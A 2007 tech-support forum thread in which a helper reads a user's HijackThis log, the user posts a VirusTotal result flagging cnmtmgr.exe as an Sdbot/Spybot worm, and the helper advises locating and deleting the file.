C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\cnmtmgr.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\Ati2evxx.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\explorer.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINNT\system32\ZoneLabs\vsmon.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer Provided by SHAW Internet
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [shawnotify] c:\progra~1\shaw\update\updateloader.exe /notify
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe"
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O16 - DPF: {0B79F48A-E8D6-11DB-9283-E25056D89593} (F-Secure Online Scanner 3.1) - http://support.f-secure.com/ols/fscax.cab
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {49E71DB9-E803-43BA-AF81-1CAF61A6C4CB} (F-Secure Online Scanner 3.2) - http://support.f-secure.com/ols/beta/fscax.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188412521140
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

--
End of file - 3650 bytes

[pskelley]

http://virusscan.jotti.org/
http://www.kaspersky.com/scanforvirus
http://www.virustotal.com/

C:\WINNT\cnmtmgr.exe <<< scan that file, if it is bad, delete it

C:\WINNT\SYSTEM32\I <<< this has to be I something? I.exe ? I.dll ?
I can not google I

If you scanned it and it came back bad, delete it. You are gone to need a file ending though.

Here is a tool that can delete the junk for you if they give you trouble.
How to use the Delete on Reboot tool
http://www.bleepingcomputer.com/tuto...42.html#delreb

Thanks

[mightyuselessone]

I can not find the file C:\WINNT\cnmtmgr.exe on my own as far as i can tell i have all files visable including hidden ones. So am curious as to where it is. I manually typed in the file and Virus Total managed to upload it and here are the results. Now how do i find it to delete it. the other file C:\WINNT\system32\I has not got a designation(exe, cab, dll, etc.) it was list as file type: file when i looked at the properties of it. So I deleted it hopefully that took care of that part and it does not return if it is a bad file. please advise. ty
mightyuselessone


File cnmtmgr.exe received on 08.30.2007 21:54:38 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 7/32 (21.88%)
Loading server information...
Your file is queued in position: 2.
Estimated start time is between 43 and 62 seconds.
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.
Compact Compact
Print results Print results
Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position: ) for an undefined time.

You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.
Email:

Antivirus Version Last Update Result
AhnLab-V3 2007.8.31.0 2007.08.30 -
AntiVir 7.4.1.66 2007.08.30 HEUR/Crypted
Authentium 4.93.8 2007.08.29 -
Avast 4.7.1029.0 2007.08.30 -
AVG 7.5.0.484 2007.08.30 -
BitDefender 7.2 2007.08.30 DeepScan:Generic.Sdbot.30E42382
CAT-QuickHeal 9.00 2007.08.30 -
ClamAV 0.91.2 2007.08.30 -
DrWeb 4.33 2007.08.30 -
eSafe 7.0.15.0 2007.08.29 -
eTrust-Vet 31.1.5095 2007.08.30 -
Ewido 4.0 2007.08.30 -
FileAdvisor 1 2007.08.30 -
Fortinet 3.11.0.0 2007.08.30 -
F-Prot 4.3.2.48 2007.08.29 -
F-Secure 6.70.13030.0 2007.08.30 -
Ikarus T3.1.1.12 2007.08.30 Generic.Sdbot
Kaspersky 4.0.2.24 2007.08.30 -
McAfee 5109 2007.08.30 -
Microsoft 1.2803 2007.08.30 -
NOD32v2 2492 2007.08.30 -
Norman 5.80.02 2007.08.30 -
Panda 9.0.0.4 2007.08.29 -
Prevx1 V2 2007.08.30 Generic.Malware
Rising 19.38.32.00 2007.08.30 -
Sophos 4.21.0 2007.08.30 -
Sunbelt 2.2.907.0 2007.08.25 VIPRE.Suspicious
Symantec 10 2007.08.30 W32.Spybot.Worm
TheHacker 6.1.9.175 2007.08.30 -
VBA32 3.12.2.3 2007.08.30 -
VirusBuster 4.3.26:9 2007.08.30 -
Webwasher-Gateway 6.0.1 2007.08.30 Heuristic.Crypted
Additional information
File size: 512000 bytes
MD5: 750b6410cc7f0b2d029c5c19f7cc8277
SHA1: 4ecee6b3812cf13197ea96f4920c0d80cf3dbdd3
packers: Themida
Prevx info: http://fileinfo.prevx.com/fileinfo.a...20A10002CDF62E
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

[pskelley]

Look at the last HJT log you posted:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:23:58 PM, on 30/08/2007

You only have 16 items that start with C:\WINNT\

and it is one of them:
C:\WINNT\cnmtmgr.exe

Use Search Companion to locate it, the hackers do not make it easy, it could be in Temp Prefetch or elsewhere.
It needs to be located and deleted and you are the only one that can do it. Be patient with Search Companion, there are a lot of files to look through.

Thanks